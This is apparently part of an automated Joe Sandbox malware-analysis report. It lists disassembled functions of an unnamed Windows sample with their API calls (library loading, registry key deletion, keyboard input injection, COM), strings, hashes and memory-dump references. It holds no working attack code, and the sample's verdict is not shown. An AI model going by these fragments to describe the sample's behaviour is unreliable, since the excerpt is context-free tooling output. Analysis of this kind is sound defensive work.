Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetProcessId$kernel32.dll
API String ID: 2574300362-399901964
Opcode ID: 627967cb71e48d10673621691130773263dcea4df23c2499496920bdbbd3e626
Instruction ID: dfd3bad30a5561ea5b45ff8581c50b9d535881da97454e843df813929294b936
Opcode Fuzzy Hash: 627967cb71e48d10673621691130773263dcea4df23c2499496920bdbbd3e626
Instruction Fuzzy Hash: 4BD05E75500716AFC7218B60BC08B4176D4AB08300F12C81EA846A2150DAB0D8808790

Function 00A1434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00A141BB,00A14341,?,00A1422F,?,00A141BB,?,?,?,?,00A139FE,?,00000001), ref: 00A14359
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00A1436B

Strings

Wow64DisableWow64FsRedirection, xrefs: 00A14365
kernel32.dll, xrefs: 00A14354

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 255acc482281e80de154c26b2e53c4586f5cbfd44890fa07d03d3b93f1468312
Instruction ID: b5f30f56c6afdfdefb2197e205f78ea4e9b9325d962d542d4904136554c535a2
Opcode Fuzzy Hash: 255acc482281e80de154c26b2e53c4586f5cbfd44890fa07d03d3b93f1468312
Instruction Fuzzy Hash: 36D0C771544712BFD7209F75E808B4176D4BB14716B11892EE4D5E6150DFB0D8C18750

Function 00A50539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,?,00A5051D,?,00A505FE), ref: 00A50547
GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00A50559

Strings

oleaut32.dll, xrefs: 00A50542
RegisterTypeLibForUser, xrefs: 00A50553

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1071820185
Opcode ID: 4b7218c134a5b72821325c9965beb8b047afcda3b0dc9ec2427730fd96dcaf41
Instruction ID: 5b59cb8bf24fb60b08c2168d1cbc095978ee3664a4134b803ece7c47a7a423f3
Opcode Fuzzy Hash: 4b7218c134a5b72821325c9965beb8b047afcda3b0dc9ec2427730fd96dcaf41
Instruction Fuzzy Hash: C6D0C771544716AFD720DF65E808F41B6E4BB14712B61C91EE856D2150EE70C8C58B50

Function 00A50564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00A5052F,?,00A506D7), ref: 00A50572
GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00A50584

Strings

oleaut32.dll, xrefs: 00A5056D
UnRegisterTypeLibForUser, xrefs: 00A5057E

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: UnRegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1587604923
Opcode ID: 3df080a86665c50833e123ca5e4bfa3673b19e8f040e65041c874c863edf6294
Instruction ID: addf039a2e0b5849a794e3a8156c69909fb5911021bcdf19175bbdd6a67ed26d
Opcode Fuzzy Hash: 3df080a86665c50833e123ca5e4bfa3673b19e8f040e65041c874c863edf6294
Instruction Fuzzy Hash: CAD09E71504716AAD7209F65A808F42B7E4BF04711F21891EEC5592150EA70D4C58B60

Function 00A6ECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00A6ECBE,?,00A6EBBB), ref: 00A6ECD6
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00A6ECE8

Strings

GetSystemWow64DirectoryW, xrefs: 00A6ECE2
kernel32.dll, xrefs: 00A6ECD1

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: 76788cabc4ae46d58d8c84afe6760a5e14a82fed7966874ef1a0097a04d0cd44
Instruction ID: b07ffad6cc22b4889643718ec60579cb26a79efac39173ef35249724fbad0f24
Opcode Fuzzy Hash: 76788cabc4ae46d58d8c84afe6760a5e14a82fed7966874ef1a0097a04d0cd44
Instruction Fuzzy Hash: CCD0A7B5500723AFCB20DFA4E948B027AF8BF04704B21881EF845E2150DFB0C8C48750

Function 00A6BADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,00A6BAD3,00000001,00A6B6EE,?,00AADC00), ref: 00A6BAEB
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00A6BAFD

Strings

GetModuleHandleExW, xrefs: 00A6BAF7
kernel32.dll, xrefs: 00A6BAE6

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 5c91339629bad6d265f96321b76b500d45d4753cb3d158ff3b5733a03296e50a
Instruction ID: ccb3a94cf00b27c0a63a8f3b021cd653b0d5a2a04a3ad8ef7887a142d01242ac
Opcode Fuzzy Hash: 5c91339629bad6d265f96321b76b500d45d4753cb3d158ff3b5733a03296e50a
Instruction Fuzzy Hash: 6DD0A771910712AFC7309F60F848F1176F4BB04300B11881EE853E2154DBB0C8C0C724

Function 00A73BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00A73BD1,?,00A73E06), ref: 00A73BE9
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00A73BFB

Strings

RegDeleteKeyExW, xrefs: 00A73BF5
advapi32.dll, xrefs: 00A73BE4

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 8a3d15af8bc526bcdff0c6c82667ebd11dfbe9be45a2aaddb446313857245fd0
Instruction ID: c76eba67d49ccec6f363a2a9409b7e4098d4d8cf49b5409ef98112fb0cf5553e
Opcode Fuzzy Hash: 8a3d15af8bc526bcdff0c6c82667ebd11dfbe9be45a2aaddb446313857245fd0
Instruction Fuzzy Hash: CED0A772500722AFCB209FA0EC08B03BAF4BB05718F22C81EE449F2150DBB0C4C48E10

Function 00A49B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89ce4b481471a0a96542297e7f09dcd8abb459806c6eabc2e32b222a949bae6f
Instruction ID: 6fead9251638b2b04a1093b60c50d41ad9b3d3d07f3a9f1e6d6fdccf36b235fc
Opcode Fuzzy Hash: 89ce4b481471a0a96542297e7f09dcd8abb459806c6eabc2e32b222a949bae6f
Instruction Fuzzy Hash: B3C13B79A0021AEFDB14DF94C985EAFB7B5FF88700F104598E905AB251D730EE51DBA0

Function 00A6AA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00A6AAB4
CoUninitialize.OLE32 ref: 00A6AABF

Part of subcall function 00A50213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00A5027B

VariantInit.OLEAUT32(?), ref: 00A6AACA
VariantClear.OLEAUT32(?), ref: 00A6AD9D

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 55443a7798c13980e2dede96e3f44f8dbe5d073a802e1acb390cd99d02014f99
Instruction ID: eaca1fceb20422973ceb0bd3697e4c92f79f7fc02320a4cfca37719a4d5ba0da
Opcode Fuzzy Hash: 55443a7798c13980e2dede96e3f44f8dbe5d073a802e1acb390cd99d02014f99
Instruction Fuzzy Hash: FEA146756047019FCB10EF58C591B5AB7F4BF98720F148459FA9AAB3A2CB30ED44CB86

Function 00A491CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00A491DD
SysAllocString.OLEAUT32(?), ref: 00A49286
VariantCopy.OLEAUT32 ref: 00A492B5
VariantClear.OLEAUT32(?), ref: 00A492DC

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: b7bc5c76b5550f2d61593a56231877e98e619291d21159ab7b75580ccbd91c40
Instruction ID: 724e1f44132645fbfec3d9ed295083a61e5130409f01472d732a90f99ec7bbf6
Opcode Fuzzy Hash: b7bc5c76b5550f2d61593a56231877e98e619291d21159ab7b75580ccbd91c40
Instruction Fuzzy Hash: D451A4386047069BDB24AF69D495A6FB3E5EFCA310F20982FE546CB2D1DB70A8908705

Function 00A3365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A336B7
_memcpy_s.LIBCMT ref: 00A33729
__filbuf.LIBCMT ref: 00A337AA
_memset.LIBCMT ref: 00A337EE

Part of subcall function 00A37C0E: __getptd_noexit.LIBCMT ref: 00A37C0E

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit_memcpy_s
String ID:
API String ID: 3877424927-0
Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
Instruction ID: 3484b35532ec857acd39fc9b1067665668e50da96e0d2bb62f7af670fc05cb5f
Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
Instruction Fuzzy Hash: A151A5B2A08305AFDF24DF69C98566FB7B5AF40320F248729F826962D0D775DF509B40

Function 00A7C4D7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00C56DC8,?), ref: 00A7C544
ScreenToClient.USER32(?,00000002), ref: 00A7C574
MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 00A7C5DA

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 91a91d62456bfce58e928e1a1bda0d6bba2a922ba9f47ae0e85452e277c50cdb
Instruction ID: a815c67e058e63fb5ac4450e8a077297830558f75b14d8bebfbd33407cb7ee78
Opcode Fuzzy Hash: 91a91d62456bfce58e928e1a1bda0d6bba2a922ba9f47ae0e85452e277c50cdb
Instruction Fuzzy Hash: DD513F75A00205EFCF20DF68DC809AE77B6EB55324F10C65AF9599B290D731EE81CB90

Function 00A4C410 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00A4C462
__itow.LIBCMT ref: 00A4C49C

Part of subcall function 00A4C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00A4C753

SendMessageW.USER32(?,0000110A,00000001,?), ref: 00A4C505
__itow.LIBCMT ref: 00A4C55A

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 7eaee8413d2beeb82235b35062dc9c184d0d33a23be986cb9a33dd8610b7e508
Instruction ID: 4f7433fea926d452daa06cb4249ad6d29dc82c758a8528dd4cc430a75d40a723
Opcode Fuzzy Hash: 7eaee8413d2beeb82235b35062dc9c184d0d33a23be986cb9a33dd8610b7e508
Instruction Fuzzy Hash: C541D975A40208BFDF15EF64C955FEE7BB5AF89720F000019FA09A7181DB709A85CBA2

Function 00A5390C Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00A53966
SetKeyboardState.USER32(00000080,?,00000001), ref: 00A53982
PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00A539EF
SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00A53A4D

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 1986c3cf7abadc9584926a50fa4d1859abd8558a8cb5c64b90f633dff534e3c1
Instruction ID: 96c152ae9680b37082fa9ff42287a83d16dd47cee4fc65d8cbe85ad816d6c2cf
Opcode Fuzzy Hash: 1986c3cf7abadc9584926a50fa4d1859abd8558a8cb5c64b90f633dff534e3c1
Instruction Fuzzy Hash: 834129B2A04208EAEF318B64C8167FDBBB5BB95392F04011AFDC1921C1C7B58E8DD761

Function 00A7B544 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00A7B5D1

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 6db0ad064e587d2f518191a8e48a959547e7f7297e958610ede4484bc225e377
Instruction ID: b802b2e728fa448662d6aee5d7b463e8d43d8a7025ff1a3c33fe09ed9cd08331
Opcode Fuzzy Hash: 6db0ad064e587d2f518191a8e48a959547e7f7297e958610ede4484bc225e377
Instruction Fuzzy Hash: F531BCB4621208BFEF20DF58CC99FA87775AB05714F64C112FB5AD62E1DB30E9818B61

Function 00A7D7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00A7D807
GetWindowRect.USER32(?,?), ref: 00A7D87D
PtInRect.USER32(?,?,00A7ED5A), ref: 00A7D88D
MessageBeep.USER32(00000000), ref: 00A7D8FE

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 571b4467f2f73b0be69f7129185cfc57aa2dae677be87d8573898ea9a5c52e20
Instruction ID: 56968ab34179f473de15c491331b6443ef28620d9d7d43f89d1d5126bd4c931f
Opcode Fuzzy Hash: 571b4467f2f73b0be69f7129185cfc57aa2dae677be87d8573898ea9a5c52e20
Instruction Fuzzy Hash: D9419C71A00219EFCB11DF98DC84BA97BF5FF48310F18C1AAE5199B260D730E942CB42

Function 00A53A61 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 00A53AB8
SetKeyboardState.USER32(00000080,?,00008000), ref: 00A53AD4
PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00A53B34
SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 00A53B92

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 1023326501121dc2dcfdf79e1d0b4feef34186c30a6053aed95a9eb76c631738
Instruction ID: d98f7d79225ee9f7022bed08e84f823c9f2c603c9cfda4f76e222d71c7c3214e
Opcode Fuzzy Hash: 1023326501121dc2dcfdf79e1d0b4feef34186c30a6053aed95a9eb76c631738
Instruction Fuzzy Hash: 17312872A00258AEEF218B6488197FD7BB5BB95352F05015AFC81931D1C7758F8DC761

Function 00A44004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00A44038
__isleadbyte_l.LIBCMT ref: 00A44066
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00A44094
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00A440CA

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: e4b14a1f90310300c6b7bf99f1d36ea81a512428dff6492d0e48dcd5c579bbea
Instruction ID: 2980f4728ef7e308731a1106f013d214fc147829f8481723d13078505e638f88
Opcode Fuzzy Hash: e4b14a1f90310300c6b7bf99f1d36ea81a512428dff6492d0e48dcd5c579bbea
Instruction Fuzzy Hash: 1931D039600206AFDB21DF74C845BBA7BB5BFC8310F254029F6618B0A0E735DCA1DB90

Function 00A77CA5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00A77CB9

Part of subcall function 00A55F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A55F6F
Part of subcall function 00A55F55: GetCurrentThreadId.KERNEL32 ref: 00A55F76
